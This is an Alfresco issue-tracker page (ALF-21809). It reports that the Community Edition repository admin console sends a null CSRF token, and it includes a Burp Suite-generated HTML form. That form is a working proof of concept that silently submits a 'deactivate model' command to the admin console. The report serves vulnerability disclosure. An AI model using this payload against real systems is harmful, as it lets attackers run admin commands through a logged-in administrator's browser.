Uploaded image for project: 'Alfresco'
  1. Alfresco
  2. ALF-21809

The Community admin console isn't using the CSRF prevention token

    Details

    • Security Severity:
      Medium

      Description

      On security testing of vanilla install of Community Edition 2016-12 on Debian Jessie I noted in the repo admin console the alf-csrftoken URL parameter is set to "null", and the form requests have no alf-csrftoken set.

      On testing I was able to issue a CSRF to deactivate a model, presumably any other admin console commands can be run via CSRF if an admin is logged into the Repo console visits a malicious web page.

      <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
      <form action="http://192.168.56.103:8080/alfresco/s/admin/admin-repoconsole?t=%2Fadmin%2Fadmin-repoconsole&alf-csrftoken=null" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="repo-cmd" value="deactivate model model1" />
      <input type="submit" value="Submit request" />
      </form>
      </body>
      </html>

        Attachments

          Structure

            Activity

              People

              • Assignee:
                closedissues Closed Issues
                Reporter:
                simonwaters Simon Waters (Inactive)
              • Votes:
                0 Vote for this issue
                Watchers:
                4 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved:
                  Date of First Response:

                  Structure Helper Panel